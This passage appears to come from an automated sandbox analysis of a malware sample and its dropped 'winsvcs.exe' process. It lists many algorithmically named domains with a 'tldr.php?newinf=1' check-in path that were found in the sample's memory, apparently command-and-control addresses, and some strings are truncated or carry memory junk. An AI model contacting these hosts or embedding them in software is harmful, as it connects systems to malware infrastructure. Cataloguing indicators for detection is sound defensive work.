http://nousiieiffgogogoo.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nousiieiffgogogoo.su/tldr.php?newinf=1oh
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1O
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.com/tldr.php?newinf=17
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.in/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.in/tldr.php?newinf=1Dh
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.net/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.ru/tldr.php?newinf=1=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.su/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slpsrgpsrhojifdij.su/tldr.php?newinf=1s1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://srndndubsbsifurfd.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1a
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.biz/tldr.php?newinf=1r
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://srndndubsbsifurfd.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.com/tldr.php?newinf=1nj
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://srndndubsbsifurfd.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.in/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.in/tldr.php?newinf=19h
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://srndndubsbsifurfd.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://srndndubsbsifurfd.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.net/tldr.php?newinf=1A
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://srndndubsbsifurfd.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://srndndubsbsifurfd.su/
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsue
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srndndubsbsifurfd.su/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.biz/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.com/tldr.php?newinf=1
